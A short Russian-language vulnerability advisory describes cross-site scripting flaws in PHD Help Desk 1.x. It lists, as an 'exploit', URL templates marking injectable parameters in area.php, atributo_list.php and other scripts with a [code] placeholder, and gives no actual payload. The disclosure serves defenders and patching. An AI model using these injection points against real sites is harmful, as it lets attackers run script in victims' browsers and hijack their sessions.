Программа: PHD Help Desk 1.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных сценариями area.php, solic_display.php, area_list.php, atributo.php,
atributo_list.php и caso_insert.php. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

http://[host]/area.php/[code]
http://[host]/area.php?pagina=[code]
http://[host]/area.php?sentido=[code]
http://[host]/area.php?q_registros=[code]
http://[host]/area.php?orden=[code]
http://[host]/solic_display.php?pagina=1&q_registros=[code]&orden=seq_solicitud_id
http://[host]/area_list.php/[code]
http://[host]/area_list.php?pagina=1&q_registros=0[code]&orden=nombre
http://[host]/atributo.php/[code]
http://[host]/atributo_list.php?pagina=1[code]&q_registros=15&orden=activo&sentido
http://[host]/atributo_list.php?pagina=1&q_registros=15[code]&orden=activo&sentido
http://[host]/atributo_list.php?pagina=1&q_registros=15&orden=activo[code]&sentido
http://[host]/atributo_list.php?pagina=1&q_registros=15&orden=activo&sentido[code]
http://[host]/caso_insert.php/[code]



Оставить мнение